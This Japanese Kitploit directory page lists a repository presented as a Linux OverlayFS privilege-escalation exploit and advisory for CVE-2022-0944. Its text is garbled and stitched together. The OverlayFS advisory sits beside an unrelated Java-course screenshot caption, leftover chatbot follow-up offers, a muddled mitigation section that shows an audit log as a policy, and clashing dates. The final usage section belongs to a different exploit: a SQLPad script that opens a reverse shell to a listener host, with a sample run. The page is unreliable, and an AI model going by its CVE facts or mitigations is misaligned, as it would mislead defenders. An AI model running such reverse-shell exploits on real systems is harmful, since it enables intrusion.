Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
OverlayFS-PrivEsc-CVE-2022-0944 — CVE-2022-0944のエクスプロイトとアドバイザリ。LinuxカーネルのOverlayFS権限昇格の脆弱性であり、検出および緩和手順を含みます。 | Kitploit
ツール/GitHubGitHub/artemisxxx37/overlayfs-privesc-cve-2022-0944
特権昇格脆弱性分析エクスプロイト学習と教育
GitHubartemisxxx37/overlayfs-privesc-cve-2022-0944

OverlayFS-PrivEsc-CVE-2022-0944

CVE-2022-0944のエクスプロイトとアドバイザリ。LinuxカーネルのOverlayFS権限昇格の脆弱性であり、検出および緩和手順を含みます。

リポジトリを見る

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
11年前未レビュー

CVE-2022-0944: OverlayFSにおける権限昇格の脆弱性 🛡️

CVE Severity

OverlayFSにおけるLinuxカーネルの権限昇格脆弱性に関するセキュリティアドバイザリと緩和ガイド。

📜 概要

CVE-2022-0944 は、LinuxカーネルのOverlayFSサブシステムにおけるセキュリティ脆弱性であり、特定の設定でのファイル作成の不適切な処理を通じてローカル攻撃者が権限を昇格させることを可能にします。

📌 技術的詳細

2025年3月26日 17:15:46 のスクリーンショット - Java初心者向けコースを公開しましたが、残念ながらガイド用のREADMEファイルがありません

🚨 影響

ローカル攻撃者は以下が可能となります。

  • 巧妙に細工されたファイル操作によりroot権限を取得
  • セキュリティ制限を回避
  • 機密システムファイルを改ざん
  • システム全体の完全性を侵害

🔍 検出

  1. カーネルバージョンの確認 uname -r

Affected versions: 5.8 <= kernel < 5.16.12

  1. OverlayFSの使用状況の確認 mount | grep overlay

Systems using OverlayFS mounts are at risk

  1. セキュリティアドバイザリの確認

For Debian/Ubuntu:

root@kitploit:~
grep CVE-2022-0944 /var/log/apt/history.log

# For RHEL/CentOS:
rpm -q --changelog kernel | grep CVE-2022-0944

4.🛡️ 緩和策

公式パッチ

以下の修正バージョンのいずれかに更新してください。

  • Linuxカーネル5.16.12以降
  • ベンダー固有のバックポートパッチ

更新コマンド:

Ubuntu/Debian

sudo apt update && sudo apt upgrade linux-image-$(uname -r)

RHEL/CentOS

sudo yum update kernel

回避策(パッチ適用が直ちにできない場合)

  • OverlayFSの使用を制限する: sudo modprobe -r overlay

  • 名前空間の制限を実装する:
    # Create unprivileged user namespace unshare -Ur

    root@kitploit:~
      # Mount with user restrictions
      mount -t overlay -o lowerdir=/lower,upperdir=/upper,workdir=/work overlay /mnt
    
  • SELinux/AppArmorポリシーを適用する: type=AVC msg=audit(1647452829.123:456): user pid=1234 comm="mount" scontext=user_u:user_r:user_t tcontext=system_u:object_r:unlabeled_t denied { mounton }

    ⚠️ 免責事項 このドキュメントは情報提供のみを目的として提供されています。正確性を確保するための努力がなされていますが、保証はありません。必ず開発環境でパッチをテストしてから本番環境に適用してください。

最終更新日: 2023-10-01 | 変更ログを見る

主な機能:

  1. セキュリティバッジによる明確な脆弱性分類
  2. クイックリファレンス技術詳細表
  3. 実行可能な検出および緩和手順
  4. ベンダー固有の更新コマンド
  5. セキュリティポリシーの例(SELinux/AppArmor)
  6. 公式リファレンスリンク
  7. 脆弱性開示基準への準拠

このREADME形式は以下に適しています:

  • セキュリティチーム
  • システム管理者
  • DevOpsエンジニア
  • オープンソースメンテナー
  • 脆弱性データベース

以下の操作はいかがでしょうか:

  1. 特定ベンダーのパッチ情報を追加しますか?
  2. エクスプロイトの概念実証詳細を含めますか?(注意事項あり)
  3. さらに検出スクリプトを追加しますか?
  4. 特定のLinuxディストリビューション向けにカスタマイズしますか?

Usage

root@kitploit:~
usage: main.py [-h] url lhost lport [username] [password]

positional arguments:
  url         URL to SQLPad
  lhost       Listener host address for reverse shell
  lport       Listener port for reverse shell
  username    login username (optional)
  password    login password (optional)

options:
  -h, --help  show this help message and exit

例:

root@kitploit:~
# install requirements
pip install -r requirements.txt

# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0

# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin

免責事項

このリポジトリに含まれるコードとツールは、教育目的、特にサイバーセキュリティコースや学習環境での使用のみを目的としています。このコードの作成者は、このコードの使用、誤用、または変更から生じるいかなる結果に対しても責任を負いません。このコードは「現状のまま」提供され、明示または黙示を問わず、商品性や特定目的への適合性の黙示の保証を含むがこれに限定されない、いかなる保証もありません。

ツールをダウンロード